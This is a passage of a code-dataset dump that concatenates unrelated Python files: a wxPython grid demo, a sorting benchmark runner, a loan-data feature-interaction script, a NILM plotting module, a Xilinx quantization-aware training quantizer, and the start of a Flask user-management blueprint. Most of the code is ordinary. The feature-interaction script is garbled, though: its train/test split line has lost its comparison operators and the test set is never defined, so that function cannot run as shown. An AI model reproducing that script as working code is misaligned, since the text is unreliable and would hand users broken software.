self.setCellAttrib2()\r\n for i in range (grid.GetNumberRows()):\r\n grid.SetAttr(i, 0, attr) \r\n grid.SetAttr(i, 1, attr) \r\n grid.SetAttr(i, 2, attr) \r\n grid.SetRowMinimalAcceptableHeight (50)\r\n\r\n grid.SetCellValue(0, 0, \"1\\n2\\n3\\non sep lines?\")\r\n grid.SetCellValue(0, 1, \"Press Enter\\nfor a new line?\")\r\n grid.AutoSizeRows(setAsMin = True)\r\n \r\n self.grid = grid\r\n \r\n self.Center()\r\n self.Show() \r\n\r\n grid.Bind(wx.grid.EVT_GRID_EDITOR_CREATED, self.OnEditorCreated)\r\n grid.Bind(wx.grid.EVT_GRID_SELECT_CELL, self.OnSelectCell) \r\n \r\n \r\n def setCellAttrib2(self):\r\n attr = wx.grid.GridCellAttr()\r\n attr.SetFont(wx.Font(8, wx.ROMAN, wx.NORMAL, wx.NORMAL, False, 'Tahoma'))\r\n attr.SetAlignment(wx.ALIGN_LEFT, wx.ALIGN_LEFT) \r\n attr.SetEditor(wx.grid.GridCellAutoWrapStringEditor()) \r\n #attr.SetRenderer(wx.grid.GridCellAutoWrapStringRenderer()) #Use CustomGridCellAutoWrapStringRenderer\r\n attr.IncRef()\r\n return attr\r\n \r\n \r\n def OnSelectCell(self, event):\r\n self.row = event.GetRow()\r\n self.col = event.GetCol() \r\n #print \"Selected R/C** 1\", self.row, self.col\r\n #print self.grid.GetCellValue(self.row, self.col)\r\n# self.grid.AutoSizeRow(self.row, setAsMin = True) \r\n\r\n # Enable This line to autosize newly entered text\r\n #------------------------------------------------\r\n self.grid.AutoSizeRows(setAsMin = True)\r\n event.Skip() \r\n\r\n\r\n\r\n# from https://groups.google.com/forum/?hl=en&fromgroups=#!searchin/wxpython-users/\r\n# newline$20wx.grid/wxpython-users/bMiG-jN03k4/uf4svkiAlJ0J\r\n# ---------------------------------------------------------------------------------\r\n def OnEditorCreated(self, event):\r\n def HandleKey(event):\r\n #print self.row,self.col, 'Key=',event.KeyCode\r\n if event.KeyCode == wx.WXK_RETURN:\r\n event.GetEventObject().WriteText('\\n')\r\n #print \"GOT IT\"\r\n else:\r\n event.Skip()\r\n\r\n # Since the grid pushes a new wx.EvtHandler onto the control's\r\n # event handler stack, Bind to the first event handler on the\r\n # stack instead of directly to the control so we can get first\r\n # crack at the event.\r\n ctrlEH = event.GetControl().GetEventHandler()\r\n ctrlEH.Bind(wx.EVT_KEY_DOWN, HandleKey)\r\n \r\n\r\n\r\ndef main():\r\n app = wx.App()\r\n MyFrame()\r\n app.MainLoop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"game/cellWrap4.py","file_name":"cellWrap4.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"147115379","text":"\nimport config as cf\nimport controller\nfrom DISClib.ADT import list as lt\nassert cf\n\ndef prueba(tamano_lista:int,tipo_lista:int,tipo_ordenamiento:int)->float:\n tipo_lista=str(tipo_lista)\n catalog = controller.initCatalog(tipo_lista)\n controller.loadData(catalog)\n tamano_datos_cargados = lt.size(catalog['videos'])+1\n result = controller.sort_videos(catalog, tipo_ordenamiento, tamano_lista)\n return float(result[0])\n\ndef ejecutar_prueba()->None:\n nombre_csv=input(\"Teclee el nombre del csv donde quiere guardar los datos: \")\n tamano_maximo=int(input('Teclee el tamaño máximo de datos a analizar: '))\n archivo=open(nombre_csv,'w')\n archivo.write('Tamaño,QuickSort-Array,MergeSort-Array,QuickSort-Linked,MergeSort-Linked\\n')\n size=1000\n cadena=str(size)+','\n i=0\n while size <= tamano_maximo:\n if i==0:\n #Se calcula el quickarray\n tiempo1=prueba(size,2,1)\n tiempo2=prueba(size,2,1)\n tiempo3=prueba(size,2,1)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+'\\n'\n \"\"\"elif i==1:\n #Se calcula el mergearray\n tiempo1=prueba(size,2,2)\n tiempo2=prueba(size,2,2)\n tiempo3=prueba(size,2,2)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+'\\n'\n elif i==2:\n #Se calcula el quicklinked\n tiempo1=prueba(size,2,1)\n tiempo2=prueba(size,2,1)\n tiempo3=prueba(size,2,1)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+','\n elif i==3:\n #Se calcula el mergelinked\n tiempo1=prueba(size,2,2)\n tiempo2=prueba(size,2,2)\n tiempo3=prueba(size,2,2)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+'\\n' \"\"\" \n i+=1\n if size==tamano_maximo and i>0:\n archivo.write(cadena)\n size+=1\n elif i>0:\n archivo.write(cadena)\n size*=2\n cadena=str(size)+','\n i=0\n archivo.close()\n\ndef ejecutar_ultima():\n nombre_csv=input(\"Teclee el nombre del csv donde quiere guardar los datos: \")\n tamano_maximo=int(input('Teclee el tamaño máximo de datos a analizar: '))\n archivo=open(nombre_csv,'w')\n #archivo.write('Tamaño,QuickSort-Array,MergeSort-Array,QuickSort-Linked,MergeSort-Linked\\n')\n size = 375942\n cadena=str(size)+','\n tiempo1=prueba(size,1,1)\n tiempo2=prueba(size,1,1)\n tiempo3=prueba(size,1,1)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+','\n tiempo1=prueba(size,1,2)\n tiempo2=prueba(size,1,2)\n tiempo3=prueba(size,1,2)\n promedio=(tiempo1+tiempo2+tiempo3)/3\n cadena+=str(promedio)+'\\n'\n archivo.write(cadena)\n archivo.close()\n\n\ndef iniciar()->None:\n ejecucion=True\n while ejecucion:\n print('1. Ejecutar Prueba \\n2. Prueba final \\n3. Salir')\n opcion=int(input('Seleccione 1 o 2 o 3: '))\n if opcion==1:\n ejecutar_prueba()\n elif opcion == 2:\n ejecutar_ultima()\n elif opcion==3:\n ejecucion=False\n\n#Principal\niniciar()\n\n\n\n\n\n\n\n ","sub_path":"App/ejecutadordepruebas.py","file_name":"ejecutadordepruebas.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"55631820","text":"\n'''\nImportant notes\n\n1) This algorithm should be run after feature selection process\n2) feature descriptions file should be in the working directory. Feature description should have the original feature name and the description of the feature.\nPrecise Column names should be [Feature,Description]\n\n\n'''\n\n\n'''\nInput parameters\n\ndata : full dataset before splitting train and test sets\n\nfeatures_numerical (a list): numerical features should be in a list. Feature names should not be original feature names. They should be transformed names\n\ntarget : speicify the name of the target variable\n\ndescription_needed : set this 1 if you need the decriptions of the features\n\nno_iterations : number of time you need to run this algorithm to identify features which has better predictive power with interacting with another feature\n\nremove_cols : this should be a list. Put all the variables you need to remove before running the algo\n\ntrain_testsplit_date : give the date where you need to split training and test. Performace after adding interations is measured on the test set\n\nselected_features : selected features up to this stage\n\n\nfeature_descrption_filename : give the name of the description file as a string\n'''\n\n\n\n\n\nimport datetime\nimport time\nimport pandas as pd\nimport warnings\nimport numpy as np\nwarnings.filterwarnings('ignore')\n\nimport sqlalchemy\nfrom sklearn.preprocessing import Imputer\nfrom sklearn import linear_model\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_auc_score, mean_squared_error\n\nfrom sklearn.grid_search import GridSearchCV \nfrom xgboost import XGBClassifier\n\n\nfrom sklearn import preprocessing\nimport random\n\n\ndef create_2_feature_interactions(data,features_numerical,target,decription_needed,no_iterations\n ,remove_cols,train_testsplit_date,selected_features,feature_descrption_filename) :\n \n\n\n\n def get_oroginal_feature(x):\n \n \n if 'log' in x:\n \n x=x[:-4]\n \n \n \n \n if 'Zero' in x:\n\n return x[:-5]\n\n elif 'Median' in x:\n return x[:-7]\n\n else:\n return x\n \n \n else:\n \n if 'Zero' in x:\n\n return x[:-5]\n\n elif 'Median' in x:\n return x[:-7]\n\n else:\n return x\n\n\n def get_description(x):\n df_description2=df_description[df_description['Feature']==x].reset_index(drop=True)\n\n return df_description2.iloc[0][1]\n\n\n\n \n #df_coef.loc[:,'Feature_Original'] = [i.split('_')[0] for i in df_coef.Feature]\n selected_feats=selected_features\n \n \n\n X_final_all2=data\n \n \n \n \n AUC_withOld=[]\n AUC_onlyNew=[]\n FEATS=[]\n feat1=[]\n feat2=[]\n \n\n\n for i in range(0,no_iterations):\n random_two=random.sample(set(features_numerical), 2)\n\n X_final_all2[random_two[0]+\"$\"+random_two[1]]=X_final_all2[random_two[0]] * X_final_all2[random_two[1]]\n\n selected_feats2=selected_feats+[(random_two[0]+\"$\"+random_two[1])]\n \n train=X_final_all2[X_final_all2['LoanApplicationDateKey']=train_testsplit_date ]\n \n for i in remove_cols:\n try:\n del train[i]\n except:\n continue\n \n for i in remove_cols:\n try:\n del test[i]\n except:\n continue\n train1=train.copy()\n test1=test.copy()\n \n \n y = train1[target]\n y_test = test1[target]\n\n \n\n\n del train1[target]\n del test1[target]\n\n \n\n lr_model =linear_model.LogisticRegression(class_weight={0: 1,1:1})##,\n \n\n lr_model.fit(train1[selected_feats2], y)\n\n\n import math \n probclf=[]\n \n for a, b in lr_model.predict_proba(test1[selected_feats2]):\n probclf.append(b)\n\n val_pred_xgb_probxgb= probclf\n auc1 = roc_auc_score(y_test, val_pred_xgb_probxgb)\n\n FEATS.append(random_two[0]+\"$\"+random_two[1])\n AUC_withOld.append(auc1)\n\n\n\n train2=train.copy()\n test2=test.copy()\n\n\n y = train2[target]\n y_test = test2[target]\n\n \n\n\n del train2[target]\n del test2[target]\n \n try:\n\n selected_feats2.remove(random_two[0])\n\n except:\n pass\n\n try:\n selected_feats2.remove(random_two[1])\n\n except:\n pass\n\n lr_model =linear_model.LogisticRegression(class_weight={0: 1,1:1})##,\n # Extract the two most important features\n\n lr_model.fit(train2[selected_feats2], y)\n\n\n import math \n probclf=[]\n for a, b in lr_model.predict_proba(test2[selected_feats2]):\n probclf.append(b)\n\n val_pred_xgb_probxgb= probclf\n auc2 = roc_auc_score(y_test, val_pred_xgb_probxgb)\n AUC_onlyNew.append(auc2)\n\n feat1.append(random_two[0])\n feat2.append(random_two[1])\n \n \n df_interactions=pd.DataFrame()\n df_interactions['new_feature']=FEATS\n df_interactions['AUC_withOld']=AUC_withOld\n df_interactions['AUC_onlyNew']=AUC_onlyNew\n df_interactions['feat1']=feat1\n df_interactions['feat2']=feat2\n \n df_interactions['Feature1_Original'] = df_interactions['feat1'].map(get_oroginal_feature) \n df_interactions['Feature2_Original'] = df_interactions['feat2'].map(get_oroginal_feature) \n \n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H_%M_%S')\n st=str(st).replace(\" \", \"_\")\n \n if decription_needed==1:\n \n df_description = pd.read_csv(feature_descrption_filename,encoding='ISO-8859-1')\n\n df_interactions['feat1_desc']=df_interactions['Feature1_Original'].map(get_description) \n df_interactions['feat2_desc']=df_interactions['Feature2_Original'].map(get_description) \n \n df_interactions.to_csv('interactions'+'_'+st+'_'+str(no_iterations)+'.csv')\n \n return df_interactions\n \n","sub_path":"FeatureInteractions.py","file_name":"FeatureInteractions.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"38025449","text":"import os\nimport re\nfrom itertools import groupby\nfrom operator import itemgetter\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\n\nsns.set_style('white')\n\npath_main = os.path.realpath(__file__)\npath_main = path_main.rsplit('/', 2)[0]\n\nPATH_DATA = os.path.join(path_main, 'data')\nPATH_OUTPUT = os.path.join(path_main, 'outputs')\n\nDICT_APPLIANCES = {'dish_washer': 'Dishwasher',\n 'fridge': 'Fridge',\n 'washing_machine': 'Washing machine'}\nDICT_MAE_LIM = {'Dishwasher': [5, 25],\n 'Fridge': [20, 35],\n 'Washing machine': [10, 45]}\nF1_LIM = [.5, 1]\n\n\ndef list_dir_sorted(path_input, model):\n files = []\n for i in os.listdir(path_input):\n if (os.path.isdir(os.path.join(path_input, i))\n and model in i):\n files.append((os.path.join(path_input, i),\n float(re.search('clas_(.*)_reg', i).group(1))))\n files.sort(key=lambda tup: tup[1])\n return files\n\n\ndef list_scores(path_dir):\n list_scores_txt = []\n for i in os.listdir(path_dir):\n if (os.path.isfile(os.path.join(path_dir, i))\n and 'scores_' in i):\n list_scores_txt.append(os.path.join(path_dir, i))\n return list_scores_txt\n\n\ndef extract_scores_from_file(path_file):\n with open(path_file, 'r') as search:\n next_line_is = None\n approach = None\n appliance = None\n scores = {}\n for line in search:\n line = line.rstrip()\n if line.startswith('==='):\n next_line_is = 'approach'\n approach = None\n elif line.startswith('---'):\n next_line_is = 'appliance'\n appliance = None\n elif next_line_is == 'approach':\n approach = line\n scores[approach] = {}\n next_line_is = None\n elif next_line_is == 'appliance':\n appliance = line\n scores[approach][appliance] = {}\n next_line_is = 'score'\n elif next_line_is == 'score':\n key = line.split(': ', 1)[0]\n value = float(line.split(': ', 1)[1])\n scores[approach][appliance][key] = value\n return scores\n\n\ndef get_f1_mae_from_scores(list_scores_txt):\n list_f1 = []\n list_mae = []\n for path_file in list_scores_txt:\n dict_scores = extract_scores_from_file(path_file)\n # Include F1 from classification\n # If missing, get F1 from regression\n if 'classification' in dict_scores.keys():\n for app, dic in dict_scores['classification'].items():\n list_f1.append((app, dic['f1']))\n elif 'regression' in dict_scores.keys():\n for app, dic in dict_scores['regression'].items():\n list_f1.append((app, dic['f1']))\n # Include MAE from regression\n # If missing, get MAE from classification\n if 'regression' in dict_scores.keys():\n for app, dic in dict_scores['regression'].items():\n list_mae.append((app, dic['mae']))\n elif 'classification' in dict_scores.keys():\n for app, dic in dict_scores['classification'].items():\n list_mae.append((app, dic['mae']))\n list_f1.sort(key=lambda tup: tup[0])\n dict_f1 = dict([(k, list(list(zip(*g))[1]))\n for k, g in groupby(list_f1, itemgetter(0))])\n list_mae.sort(key=lambda tup: tup[0])\n dict_mae = dict([(k, list(list(zip(*g))[1]))\n for k, g in groupby(list_mae, itemgetter(0))])\n return dict_f1, dict_mae\n\n\ndef get_arrays(list_values):\n w = np.zeros(len(list_values))\n mean = np.zeros(len(list_values))\n std = np.zeros(len(list_values))\n for i, (weight, values) in enumerate(list_values):\n w[i] = weight\n mean[i] = np.mean(values)\n std[i] = np.std(values)\n return w, mean, std\n\n\ndef moving_average(a, n=3):\n ret = np.cumsum(a)\n ret[n:] = ret[n:] - ret[:-n]\n ret[n - 1:] = ret[n - 1:] / n\n return ret\n\n\ndef subplot_f1(ax, w, y, std, ignore_extreme, f1_lim=F1_LIM):\n color = 'tab:red'\n ax.set_xlabel('Classification weight')\n ax.set_ylabel('F1', color=color)\n up = y + std\n down = y - std\n if ignore_extreme or w.min() != 0:\n ax.plot(w[1:], y[1:], color=color)\n ax.fill_between(w[1:], down[1:], up[1:],\n color=color, alpha=0.2)\n else:\n ax.plot(w[1:], y[1:], color=color)\n ax.fill_between(w[1:], down[1:], up[1:],\n color=color, alpha=0.2)\n ax.errorbar(w[0], y[0], std[0], color=color,\n linestyle='None', marker='.')\n ax.tick_params(axis='y', labelcolor=color)\n ax.grid(axis='y')\n ax.grid(axis='x')\n if f1_lim is not None:\n ax.set_ylim(f1_lim)\n return ax\n\n\ndef subplot_mae(ax, w, y, std, ignore_extreme, app,\n dict_mae_lim=DICT_MAE_LIM):\n color = 'tab:blue'\n ax.set_ylabel('MAE (watts)',\n color=color) # we already handled the x-label with ax1\n up = y + std\n down = y - std\n if ignore_extreme or w.max() != 1:\n ax.plot(w[:-1], y[:-1], color=color)\n ax.fill_between(w[:-1], down[:-1], up[:-1],\n color=color, alpha=0.2)\n else:\n ax.plot(w[:-1], y[:-1], color=color)\n ax.fill_between(w[:-1], down[:-1], up[:-1],\n color=color, alpha=0.2)\n ax.errorbar(w[-1], y[-1], std[-1], color=color,\n linestyle='None', marker='.')\n ax.tick_params(axis='y', labelcolor=color)\n mae_lim = dict_mae_lim.get(app, None)\n if mae_lim is not None:\n ax.set_ylim(dict_mae_lim[app])\n return ax\n\n\ndef plot_arrays(w_f1, f1, f1_std, w_mae, mae, mae_std,\n app, model, dict_mae_lim=DICT_MAE_LIM, f1_lim=F1_LIM,\n movavg=1, ignore_extreme=True, figsize=(6, 4),\n savefig=None):\n app = DICT_APPLIANCES.get(app, app)\n if movavg > 1:\n f1 = moving_average(f1, n=movavg)\n mae = moving_average(mae, n=movavg)\n\n fig, ax1 = plt.subplots(figsize=figsize)\n\n ax1 = subplot_f1(ax1, w_f1, f1, f1_std, ignore_extreme, f1_lim=f1_lim)\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n ax2 = subplot_mae(ax2, w_mae, mae, mae_std, ignore_extreme, app,\n dict_mae_lim=dict_mae_lim)\n\n ax1.set_title(model + ' ' + app)\n fig.tight_layout() # otherwise the right y-label is slightly clipped\n if savefig is None:\n plt.show()\n else:\n plt.savefig(savefig)\n\n\ndef plot_weights(path_input: str, app: str,\n dict_mae_lim=DICT_MAE_LIM, f1_lim=F1_LIM,\n model: str = 'seq_480_1min', movavg: int = 1,\n ignore_extreme: bool = False, figsize=(8, 4),\n savefig=None):\n assert os.path.isdir(path_input)\n\n # List files and sort by class weight\n files = list_dir_sorted(path_input, model)\n\n list_f1 = []\n list_mae = []\n\n for path_dir, clas_w in files:\n list_scores_txt = list_scores(path_dir)\n dict_f1, dict_mae = get_f1_mae_from_scores(list_scores_txt)\n if app in dict_f1.keys():\n list_f1.append((clas_w / 100, dict_f1[app]))\n if app in dict_mae.keys():\n list_mae.append((clas_w / 100, dict_mae[app]))\n\n # Build arrays\n w_f1, f1, f1_std = get_arrays(list_f1)\n w_mae, mae, mae_std = get_arrays(list_mae)\n\n # Plot arrays\n model = path_input.rsplit('/', 1)[1]\n model = model[:-5]\n plot_arrays(w_f1, f1, f1_std, w_mae, mae, mae_std,\n app, model, dict_mae_lim=dict_mae_lim, f1_lim=f1_lim,\n movavg=movavg, ignore_extreme=ignore_extreme,\n figsize=figsize, savefig=savefig)\n","sub_path":"better_nilm/plot_output.py","file_name":"plot_output.py","file_ext":"py","file_size_in_byte":7813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"378695199","text":"# Copyright 2019 Xilinx Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom pytorch_nndct.nn.modules import fix_ops\nfrom pytorch_nndct.nn.quantization.ops import tqt_ops\n\nclass FakeQuantizer(nn.Module):\n \"\"\"Simulate the quantize and dequantize operations in training time.\n\n In general, the output of this module is given by\n x_out = (clamp(round(x / scale + zero_point), quant_min, quant_max) - zero_point) * scale\n See https://arxiv.org/pdf/1903.08066.pdf\n\n In nndct, we use symmetric quantization and power-of-2 scaling. That is,\n zero_point = 0,\n quant_min = -2^(bitwidth - 1),\n quant_max = 2^(bitwidth - 1) - 1\n \"\"\"\n _version = 2\n\n def __init__(self, bitwidth):\n super(FakeQuantizer, self).__init__()\n # quant_enabled is registered as buffer to support their replication in DDP.\n # Data type is uint8 because NCCL does not support bool tensors.\n self.register_buffer('quant_enabled', torch.tensor([1], dtype=torch.uint8))\n self.register_buffer('bitwidth', torch.tensor([bitwidth],\n dtype=torch.uint8))\n self.register_buffer('domain', torch.tensor([2**(bitwidth - 1)]).float())\n\n def forward(self, x):\n raise NotImplementedError(\n 'Do not use FakeQuantizer directly, please use its derivatives.')\n\n # PyTorch has been using _save_to_state_dict since 1.2.0.\n # See https://github.com/pytorch/pytorch/blob/v1.2.0/torch/nn/modules/module.py.\n def _save_to_state_dict(self, destination, prefix, keep_vars):\n super(FakeQuantizer, self)._save_to_state_dict(destination, prefix,\n keep_vars)\n destination.pop(prefix + 'quant_enabled')\n destination.pop(prefix + 'domain')\n\n def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n # We save 'bitwidth' to state_dict but not load it.\n # In low-bit tranining, bitwidth incrementally decreases from 8 -> 6 -> 4.\n # So the bitwidth should be get from quantizer's initialization argument\n # instead of state dict\n\n # For checkpoint BC with version 1.\n replace_map = {'num_bits': 'bitwidth'}\n\n version = local_metadata.get('version', None)\n if version is None or version < 2:\n keys = list(state_dict.keys())\n for key in keys:\n key_parts = key.split('.')\n weight_name = key_parts[-1]\n if weight_name in replace_map:\n key_parts[-1] = replace_map[weight_name]\n new_key = '.'.join(key_parts)\n assert new_key not in state_dict\n state_dict[new_key] = state_dict[key]\n state_dict.pop(key)\n\n # Check if bitwidth in the state dict but not load it.\n missing_bitwidth = False\n bitwidth_key = prefix + 'bitwidth'\n if bitwidth_key not in state_dict:\n missing_bitwidth = True\n else:\n # The value of bitwidth should be set at initilization.\n state_dict.pop(bitwidth_key)\n\n super(FakeQuantizer,\n self)._load_from_state_dict(state_dict, prefix, local_metadata,\n strict, missing_keys, unexpected_keys,\n error_msgs)\n ignored_params = ['bitwidth', 'quant_enabled', 'domain']\n ignored_keys = [prefix + name for name in ignored_params]\n for key in ignored_keys:\n if key in missing_keys:\n if key == bitwidth_key and missing_bitwidth:\n continue\n missing_keys.remove(key)\n else:\n print('[WARNING] Unexpected key in state dict:', key)\n\nclass TQTQuantizer(FakeQuantizer):\n\n def __init__(self, bitwidth, tensor_type, method = None):\n super(TQTQuantizer, self).__init__(bitwidth)\n\n valid_tensor_types = ['weight', 'act']\n if tensor_type not in valid_tensor_types:\n raise ValueError(\n \"'tensor_type' must be one of {}\".format(valid_tensor_types))\n self.tensor_type = tensor_type\n\n # See TorchQuantizer::quantize() in quantization/torchquantizer.py\n if method is not None:\n self.method = method\n else:\n self.method = 3 if tensor_type == 'weight' else 2\n self.quantize_fn_cls = tqt_ops.TQTQuantize\n\n self.log_threshold = nn.Parameter(torch.tensor([0.0]))\n self.register_buffer('warmup_enabled', torch.tensor([1], dtype=torch.uint8))\n\n self._forward_fn = self._quantize_with_warmup\n\n def _init_threshold(self, x):\n \"\"\"See Table 2 in https://arxiv.org/pdf/1903.08066.pdf\"\"\"\n\n def _max(x):\n return np.max(np.abs(x))\n\n def _3sd(x):\n y = x.astype(np.float32) if x.dtype == np.float16 else x\n return np.abs(np.mean(y + 1e-6)) + 3 * np.std(y)\n\n def _kl_j(x):\n \"\"\"\n Ref paper (Algorithm 1):\n \"Quantizing Convolutional Neural Networks for Low-Power\n High-Throughput Inference Engines\" - Sean Settle et al.\n https://arxiv.org/pdf/1805.07941.pdf\n \"\"\"\n\n def calculate_kl_j(x, y):\n return np.sum((x - y) * np.log2(x / y))\n\n mn = 0\n mx = np.max(np.abs(x))\n y = x.astype(np.float32) if x.dtype == np.float16 else x\n hist, bin_edges = np.histogram((np.abs(y)),\n 'sqrt',\n range=(mn, mx),\n density=True)\n hist = hist.astype(x.dtype)\n bin_edges = bin_edges.astype(x.dtype)\n pdf = hist / np.sum(hist)\n cdf = np.cumsum(pdf)\n n = pow(2, self.bitwidth.item() - 1)\n threshold = []\n d = []\n if n + 1 > len(bin_edges) - 1:\n return bin_edges[(-1)]\n else:\n for i in range(n + 1, len(bin_edges), 1):\n threshold_tmp = (i + 0.5) * (bin_edges[1] - bin_edges[0])\n threshold = np.concatenate((threshold, [threshold_tmp]))\n p = np.copy(cdf)\n p[i - 1:] = 1\n x = np.linspace(0.0, 1.0, n)\n xp = np.linspace(0.0, 1.0, i)\n fp = p[:i]\n p_interp = np.interp(x, xp, fp)\n x = np.linspace(0.0, 1.0, i)\n xp = np.linspace(0.0, 1.0, n)\n fp = p_interp\n q_interp = np.interp(x, xp, fp)\n q = np.copy(p)\n q[:i] = q_interp\n d_tmp = calculate_kl_j(cdf[np.nonzero(cdf)], q[np.nonzero(cdf)])\n d = np.concatenate((d, [d_tmp]))\n\n return threshold[np.argmin(d)]\n\n init_scheme = {'weight': _3sd, 'act': _kl_j}\n #init_scheme = {'weight': _max, 'act': _kl_j}\n data = x.detach().cpu().numpy()\n th = init_scheme[self.tensor_type](data)\n # TODO(yuwang): Check if th < 0.\n return torch.tensor([th], dtype=x.dtype, device=x.device)\n\n def _forward_pass_input(self, x, log_threshold, domain, method):\n return x\n\n def _quantize(self, x, log_threshold, domain, method):\n return self.quantize_fn_cls.apply(x, log_threshold, domain,\n method)\n def _quantize_with_warmup(self, x, log_threshold, domain, method):\n self.disable_warmup()\n log_threshold.data[0] = torch.log2(self._init_threshold(x))[0]\n return self._quantize(x, log_threshold, domain, method)\n\n def forward(self, x):\n #if self.quant_enabled[0] == 0:\n # return x\n\n #if self.warmup_enabled[0] == 1:\n # self.warmup_enabled[0] = 0\n # threshold = self._init_threshold(x)\n # self.log_threshold.data = torch.log2(threshold)\n\n #return self.quantize_fn_cls.apply(x, self.log_threshold, self.domain,\n # self.method)\n return self._forward_fn(x, self.log_threshold, self.domain, self.method)\n\n def enable_quant(self, enabled=True):\n self.quant_enabled[0] = 1 if enabled else 0\n\n if enabled:\n self._forward_fn = self._quantize_with_warmup if self.warmup_enabled[\n 0] == 1 else self._quantize\n else:\n self._forward_fn = self._forward_pass_input\n return self\n\n def disable_quant(self):\n return self.enable_quant(False)\n\n def enable_warmup(self, enabled=True):\n self.warmup_enabled[0] = 1 if enabled else 0\n self._forward_fn = self._quantize_with_warmup if enabled else self._quantize\n return self\n\n def disable_warmup(self):\n return self.enable_warmup(False)\n\n def is_warmup_enabled(self):\n return self.warmup_enabled[0] == 1\n\n def freeze_quant(self, frozen=True):\n self.log_threshold.requires_grad = (not frozen)\n\n def unfreeze_quant(self):\n self.freeze_quant(False)\n\n def extra_repr(self):\n return 'quant_enabled={}, bitwidth={}, method={}'.format(\n self.quant_enabled, self.bitwidth, self.method)\n\n def _save_to_state_dict(self, destination, prefix, keep_vars):\n super(TQTQuantizer, self)._save_to_state_dict(destination, prefix,\n keep_vars)\n\n def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n super(TQTQuantizer,\n self)._load_from_state_dict(state_dict, prefix, local_metadata,\n strict, missing_keys, unexpected_keys,\n error_msgs)\n self._forward_fn = self._quantize_with_warmup if self.warmup_enabled[\n 0] == 1 else self._quantize\n if self.quant_enabled[0] == 0:\n self._forward_fn = self._forward_pass_input\n\n def export_quant_info(self):\n \"\"\"Export trained threshold to TorchQuantizer's quant info [bitwidth, fp].\n\n (1) TQT: qx = clip(round(fx / scale)) * scale, scale = 2^ceil(log2t) / 2^(b-1)\n (2) NndctFixNeron: qx = clip(round(fx * scale)) * (1 / scale), scale = 2^fp\n Let (1) equals (2), we can get\n (3): 2^(b-1) / 2^ceil(log2t) = 2^fp\n => fp = b - 1 - ceil(log2t)\n\n For more details, see nndct/include/cuda/nndct_fix_kernels.cuh::_fix_neuron_v2_device\n \"\"\"\n bitwidth = self.bitwidth.item()\n ceil_log2t = torch.ceil(self.log_threshold).item()\n return [[bitwidth, int(bitwidth - 1 - ceil_log2t)]]\n\n def import_quant_info(self, qinfo):\n bitwidth, fp = qinfo\n self.bitwidth[0] = bitwidth\n self.log_threshold.data = torch.tensor([bitwidth - 1 - fp],\n dtype=self.log_threshold.dtype)\n self.disable_warmup()\n\ndef enable_quant(mod):\n if isinstance(mod, FakeQuantizer):\n mod.enable_quant()\n\ndef disable_quant(mod):\n if isinstance(mod, FakeQuantizer):\n mod.disable_quant()\n\ndef enable_warmup(mod):\n if isinstance(mod, TQTQuantizer):\n mod.enable_warmup()\n\ndef disable_warmup(mod):\n if isinstance(mod, TQTQuantizer):\n mod.disable_warmup()\n\ndef freeze_quant(mod):\n if isinstance(mod, TQTQuantizer):\n mod.freeze_quant()\n\ndef unfreeze_quant(mod):\n if isinstance(mod, TQTQuantizer):\n mod.unfreeze_quant()\n","sub_path":"src/vai_optimizer/pytorch_binding/pytorch_nndct/nn/quantization/modules/tqt.py","file_name":"tqt.py","file_ext":"py","file_size_in_byte":11249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"234377173","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for, jsonify\n)\nimport pandas as pd\nfrom werkzeug.exceptions import abort\n\nfrom .auth import login_required\nfrom .db import get_db, query_db\nfrom . import team\n\nbp = Blueprint('user', __name__, url_prefix='/user')\n\n@bp.route(\"/\")\n@login_required\ndef home():\n edit_button = \"\"\n df = pd.read_sql_query('SELECT id, first_name, surname, permission_level FROM user', get_db())\n df.columns = ['ID', 'First Name', 'Surname', 'Permission Level']\n df['Edit'] = edit_button\n return render_template('postal/all_users.html', tables=[df.to_html(classes='table results user', border=0, index=False, index_names=False, escape=False)], titles=df.columns.values)\n\n@bp.route(\"/\", methods=['GET', 'POST'])\n@login_required\ndef specific_user(user_id):\n if request.method == 'GET':\n sql = 'SELECT * FROM user WHERE id = ?'\n user = query_db(sql, [user_id], one=True)\n\n return render_template('postal/user.html', user_data=user)\n elif request.method == 'POST':\n #id = request.form['u_id']\n first_name = request.form['first_name']\n surname = request.form['surname']\n username = request.form['username']\n permission_level = request.form['permission_level']\n sql = 'UPDATE user SET first_name=?, 